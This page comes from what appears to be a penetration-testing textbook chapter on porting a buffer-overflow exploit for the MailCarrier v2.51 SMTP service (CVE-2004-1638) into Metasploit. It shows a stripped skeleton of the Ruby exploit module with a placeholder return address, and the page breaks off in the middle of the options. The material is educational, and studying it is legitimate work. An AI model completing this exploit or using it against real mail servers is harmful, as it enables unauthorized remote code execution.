218
Chapter 15
Stripping the Existing Exploit
As our first step in porting the MailCarrier exploit, we’ll strip down the exist-
ing Metasploit module to a simple skeleton file, as shown here:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name'
=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',
'Description' => %q{
This module exploits the MailCarrier v2.51 suite SMTP service.
The stack is overwritten when sending an overly long EHLO command.
},
'Author'
=> [ 'Your Name' ],
'Arch'
=> [ ARCH_X86 ],
'License'
=> MSF_LICENSE,
'Version'
=> '$Revision: 7724 $',
'References'
=>
[
[ 'CVE', '2004-1638' ],
[ 'OSVDB', '11174' ],
[ 'BID', '11535' ],
[ 'URL', 'http://www.exploit-db.com/exploits/598' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x0a\x0d\x3a",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets'
=>
[
[ 'Windows XP SP2 - EN', { 'Ret' =>
0xdeadbeef
} ],
],
'DisclosureDate' => 'Oct 26 2004',
'DefaultTarget'
=> 0))
register_options(
[
Opt::RPORT(
25
),
Opt::LHOST(), # Required for stack offset